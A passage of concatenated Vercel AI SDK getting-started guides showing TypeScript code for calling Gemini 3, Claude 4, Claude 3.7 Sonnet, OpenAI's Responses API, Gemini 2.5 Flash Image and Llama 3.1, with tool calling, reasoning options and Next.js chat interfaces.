The thinkingLevel parameter accepts different values to control the depth of reasoning applied to your prompt:
- Gemini 3 Pro supports: 'low' and 'high'
- Gemini 3 Flash supports: 'minimal', 'low', 'medium', and 'high'
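For harder problems, you could raise the level. Here is a sketch reusing the Pro preview model with 'high' (the prompt is illustrative):
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'Prove that there are infinitely many primes of the form 4k + 3.',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingLevel: 'high', // deeper reasoning at the cost of latency
      },
    } satisfies GoogleLanguageModelOptions,
  },
});
console.log(text);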
Using Tools with the AI SDK
Gemini 3 excels at tool calling with improved reliability and consistency for multi-step workflows. Here's an example of using tool calling with the AI SDK:
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
import { google } from '@ai-sdk/google';
const result = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'What is the weather in San Francisco?',
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // enables multi-step calling
});
console.log(result.text);
console.log(result.steps);
Using Google Search with Gemini
With search grounding, Gemini can access the latest information using Google search. Here's an example of using Google Search with the AI SDK:
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-3-pro-preview'),
tools: {
google_search: google.tools.googleSearch({}),
},
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
console.log({ text, sources, groundingMetadata, safetyRatings });
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Gemini 3 Pro:
In a new Next.js application, first install the AI SDK and the Google Generative AI provider:
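For example, with pnpm:
pnpm add ai @ai-sdk/react @ai-sdk/google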
Then, create a route handler for the chat endpoint:
import { google } from '@ai-sdk/google';
import { streamText, UIMessage, convertToModelMessages } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: google('gemini-3-pro-preview'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(message => (
<div key={message.id} className="whitespace-pre-wrap">
{message.role === 'user' ? 'User: ' : 'Gemini: '}
{message.parts.map((part, i) => {
switch (part.type) {
case 'text':
return <div key={`${message.id}-${i}`}>{part.text}</div>;
}
})}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed dark:bg-zinc-900 bottom-0 w-full max-w-md p-2 mb-8 border border-zinc-300 dark:border-zinc-800 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
- Read more about the Google Generative AI provider.
---
title: Get started with Claude 4
description: Get started with Claude 4 using the AI SDK.
tags: ['getting-started']
---
Get started with Claude 4
With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 4 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 4
Claude 4 is Anthropic's most advanced model family to date, offering exceptional capabilities across reasoning, instruction following, coding, and knowledge tasks. Available in two variants—Sonnet and Opus—Claude 4 delivers state-of-the-art performance with enhanced reliability and control. Claude 4 builds on the extended thinking capabilities introduced in Claude 3.7, allowing for even more sophisticated problem-solving through careful, step-by-step reasoning.
Claude 4 excels at complex reasoning, code generation and analysis, detailed content creation, and agentic capabilities, making it ideal for powering sophisticated AI workflows, customer-facing agents, and applications requiring nuanced understanding and responses. Claude Opus 4 is an excellent coding model, leading on SWE-bench (72.5%) and Terminal-bench (43.2%), with the ability to sustain performance on long-running tasks that require focused effort and thousands of steps. Claude Sonnet 4 significantly improves on Sonnet 3.7, excelling in coding with 72.7% on SWE-bench while balancing performance and efficiency.
Prompt Engineering for Claude 4 Models
Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:
- Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
- Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
- Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 4 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);
Reasoning Ability
Claude 4 enhances the extended thinking capabilities first introduced in Claude 3.7 Sonnet—the ability to solve complex problems with careful, step-by-step reasoning. Additionally, both Opus 4 and Sonnet 4 can now use tools during extended thinking, allowing Claude to alternate between reasoning and tool use to improve responses. You can enable extended thinking using the thinking provider option and specifying a thinking budget in tokens. For interleaved thinking (where Claude can think in between tool calls) you'll need to enable a beta feature using the anthropic-beta header:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicLanguageModelOptions,
},
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
});
console.log(text); // text response
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
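For example, with pnpm:
pnpm add ai @ai-sdk/react @ai-sdk/anthropic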
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-sonnet-4-20250514'),
messages: await convertToModelMessages(messages),
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicLanguageModelOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({ api: '/api/chat' }),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
<div className="flex-1 overflow-y-auto space-y-4 mb-4">
{messages.map(message => (
<div
key={message.id}
className={`p-3 rounded-lg ${
message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
}`}
>
<p className="font-semibold">
{message.role === 'user' ? 'You' : 'Claude 4'}
</p>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return (
<div key={index} className="mt-1">
{part.text}
</div>
);
}
if (part.type === 'reasoning') {
return (
<pre
key={index}
className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
>
<details>
<summary className="cursor-pointer">
View reasoning
</summary>
{part.text}
</details>
</pre>
);
}
})}
</div>
))}
</div>
<form onSubmit={handleSubmit} className="flex gap-2">
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
placeholder="Ask Claude 4 something..."
/>
<button
type="submit"
className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
>
Send
</button>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Claude 4 Model Variants
Claude 4 is available in two variants, each optimized for different use cases:
- Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
- Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
---
title: OpenAI Responses API
description: Get started with the OpenAI Responses API using the AI SDK.
tags: ['getting-started', 'agents']
---
Get started with OpenAI Responses API
With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI Responses API
OpenAI recently released the Responses API, a brand new way to build applications on OpenAI's platform. The new API offers a way to persist chat history, a web search tool for grounding LLM responses, a file search tool for finding relevant files, and a computer use tool for building agents that can interact with and operate computers. Let's explore how to use the Responses API with the AI SDK.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai.responses('gpt-4o'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Using Tools with the AI SDK
The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool, stepCountIs } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // enable multi-step 'agentic' LLM calls
});
This example demonstrates how stopWhen transforms a single LLM call into an agent. The stopWhen: stepCountIs(5) parameter allows the model to autonomously call tools, analyze results, and make additional tool calls as needed, turning what would be a simple one-shot completion into an intelligent agent that can chain multiple actions together to complete complex tasks.
Web Search Tool
The Responses API introduces a built-in web search tool for grounding responses, available in the AI SDK as openai.tools.webSearchPreview. With this tool, the model can access the internet to find relevant information for its responses.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview(),
},
});
console.log(result.text);
console.log(result.sources);
The web search tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview({
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
});
console.log(result.text);
console.log(result.sources);
MCP Tool
The Responses API also supports connecting to Model Context Protocol (MCP) servers. This allows models to call tools exposed by remote MCP servers or service connectors.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5-mini'),
prompt: 'Search the web for the latest NYC mayoral election results',
tools: {
mcp: openai.tools.mcp({
serverLabel: 'web-search',
serverUrl: 'https://mcp.exa.ai/mcp',
serverDescription: 'A web-search API for AI agents',
}),
},
});
console.log(result.text);
For more details on configuring the MCP tool, including authentication, tool filtering, and connector support, see the OpenAI provider documentation.
Using Persistence
With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history.
There are two options available to use persistence:
With previousResponseId
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result1 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Invent a new holiday and describe its traditions.',
});
const result2 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
previousResponseId: result1.providerMetadata?.openai.responseId as string,
},
},
});
With Conversations
You can use the Conversation API to create a conversation.
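Creating the conversation itself happens against OpenAI's API directly rather than through the AI SDK. A minimal sketch using the official openai Node package (the conversations.create call is an assumption about your installed SDK version):
import OpenAI from 'openai';
const client = new OpenAI();
// Create a conversation and keep its ID for later requests (assumed API surface)
const conversation = await client.conversations.create({});
console.log(conversation.id); // e.g. 'conv_123'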
Once you have created a conversation, you can continue it:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
// The ID of a conversation previously created via the OpenAI API
conversation: 'conv_123',
},
},
});
Migrating from Completions API
Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is straightforward. Simply change your provider instance from openai(modelId) to openai.responses(modelId):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
When using the Responses API, provider-specific options that were previously specified on the model provider instance have moved to the providerOptions object:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Google Gemini Image Generation description: Generate and edit images with Google Gemini 2.5 Flash Image using the AI SDK. tags: ['image-generation', 'google', 'gemini']
Generate and Edit Images with Google Gemini 2.5 Flash
This guide will show you how to generate and edit images with the AI SDK and Google's latest multimodal language model Gemini 2.5 Flash Image.
Generating Images
As Gemini 2.5 Flash Image is a language model with multimodal capabilities, you can use the generateText or streamText functions (not generateImage) to create images. The model determines which modality to respond in based on your prompt and configuration. Here's how to create your first image:
import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';
async function generateImage() {
const result = await generateText({
model: 'google/gemini-2.5-flash-image',
prompt:
'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});
// Save generated images
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
const timestamp = Date.now();
const fileName = `generated-${timestamp}.png`;
fs.mkdirSync('output', { recursive: true });
await fs.promises.writeFile(`output/${fileName}`, file.uint8Array);
console.log(`Generated and saved image: output/${fileName}`);
}
}
}
generateImage().catch(console.error);
Here are some key points to remember:
- Generated images are returned in the result.files array
- Images are returned as Uint8Array data
- The model leverages Gemini's world knowledge, so detailed prompts yield better results
Editing Images
Gemini 2.5 Flash Image excels at editing existing images with natural language instructions. You can add elements, modify styles, or transform images while maintaining their core characteristics:
import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';
async function editImage() {
const editResult = await generateText({
model: 'google/gemini-2.5-flash-image',
prompt: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Add a small wizard hat to this cat. Keep everything else the same.',
},
{
type: 'image',
// image: DataContent (string | Uint8Array | ArrayBuffer | Buffer) or URL
image: new URL(
'https://raw.githubusercontent.com/vercel/ai/refs/heads/main/examples/ai-functions/data/comic-cat.png',
),
mediaType: 'image/png',
},
],
},
],
});
// Save the edited image
const timestamp = Date.now();
fs.mkdirSync('output', { recursive: true });
for (const file of editResult.files) {
if (file.mediaType.startsWith('image/')) {
await fs.promises.writeFile(
`output/edited-${timestamp}.png`,
file.uint8Array,
);
console.log(`Saved edited image: output/edited-${timestamp}.png`);
}
}
}
editImage().catch(console.error);
What's Next?
You've learned how to generate new images from text prompts and edit existing images using natural language instructions with Google's Gemini 2.5 Flash Image model.
For more advanced techniques, integration patterns, and practical examples, check out our Cookbook where you'll find comprehensive guides for building sophisticated AI-powered applications.
title: Get started with Claude 3.7 Sonnet description: Get started with Claude 3.7 Sonnet using the AI SDK. tags: ['getting-started']
Get started with Claude 3.7 Sonnet
With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 3.7 Sonnet alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 3.7 Sonnet
Claude 3.7 Sonnet is Anthropic's most intelligent model to date and the first Claude model to offer extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. With Claude 3.7 Sonnet, you can balance speed and quality by choosing between standard thinking for near-instant responses and extended thinking for advanced reasoning. Claude 3.7 Sonnet is state-of-the-art for coding, and delivers advancements in computer use, agentic capabilities, complex reasoning, and content generation. With frontier performance and more control over speed, Claude 3.7 Sonnet is a great choice for powering AI agents, especially customer-facing agents, and complex AI workflows.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
prompt: 'How many people will live in the world in 2040?',
});
Reasoning Ability
Claude 3.7 Sonnet introduces extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. You can enable it using the thinking provider option and specifying a thinking budget in tokens:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
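For example, with pnpm (package names taken from the imports used below):
pnpm add ai @ai-sdk/react @ai-sdk/anthropic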
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-3-7-sonnet-20250219'),
messages: await convertToModelMessages(messages),
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({ api: '/api/chat' }),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Send</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Get started with Llama 3.1 description: Get started with Llama 3.1 using the AI SDK. tags: ['getting-started']
Get started with Llama 3.1
With the release of Llama 3.1, there has never been a better time to start building AI applications.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Llama 3.1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Llama 3.1
The release of Meta's Llama 3.1 is an important moment in AI development. As the first state-of-the-art open-weight AI model, Llama 3.1 is helping developers build AI apps faster. Available in 8B, 70B, and 405B sizes, these instruction-tuned models work well for tasks like dialogue generation, translation, reasoning, and code generation.
Benchmarks
Llama 3.1 surpasses most available open-source chat models on common industry benchmarks and even outperforms some closed-source models, offering superior performance in language nuances, contextual understanding, and complex multi-step tasks. The models' refined post-training processes significantly improve response alignment, reduce false refusal rates, and enhance answer diversity, making Llama 3.1 a powerful and accessible tool for building generative AI applications.
Source: Meta AI - Llama 3.1 Model Card
Choosing Model Size
Llama 3.1 includes a new 405B parameter model, becoming the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.
When choosing between the different sizes of Llama 3.1 models (405B, 70B, 8B), consider the trade-off between performance and computational requirements. The 405B model offers the highest accuracy and capability for complex tasks but requires significant computational resources. The 70B model provides a good balance of performance and efficiency for most applications, while the 8B model is suitable for simpler tasks or resource-constrained environments where speed and lower computational overhead are priorities.
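As a concrete sketch, this trade-off maps directly to DeepInfra model IDs (the 70B and 405B IDs appear elsewhere in this guide; the 8B ID is assumed to follow the same naming pattern):
import { deepinfra } from '@ai-sdk/deepinfra';
// Smaller models are faster and cheaper; larger models are more capable
const fast = deepinfra('meta-llama/Meta-Llama-3.1-8B-Instruct'); // assumed ID
const balanced = deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct');
const strongest = deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct');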
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
prompt: 'What is love?',
});
AI SDK Core abstracts away the differences between model providers, allowing you to focus on building great applications. Prefer to use Amazon Bedrock? The unified interface also means that you can easily switch between models by changing just two lines of code.
import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';
const { text } = await generateText({
model: bedrock('meta.llama3-1-405b-instruct-v1:0'),
prompt: 'What is love?',
});
Streaming the Response
To stream the model's response as it's being generated, update your code snippet to use the streamText function.
import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
const { textStream } = streamText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
prompt: 'What is love?',
});
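The returned textStream is an async iterable, so you can process tokens as they arrive. A minimal sketch:
for await (const chunk of textStream) {
process.stdout.write(chunk);
}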
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';
const { output } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Tools
While LLMs have incredible generation capabilities, they struggle with discrete tasks (e.g. mathematics) and interacting with the outside world (e.g. getting the weather). The solution: tools, which are like programs that you provide to the model, which it can choose to call as necessary.
Using Tools with the AI SDK
The AI SDK supports tool usage across several of its functions, including generateText and streamUI. By passing one or more tools to the tools parameter, you can extend the capabilities of LLMs, allowing them to perform discrete tasks and interact with external systems.
Here's an example of how you can use a tool with the AI SDK and Llama 3.1:
import { generateText, tool } from 'ai';
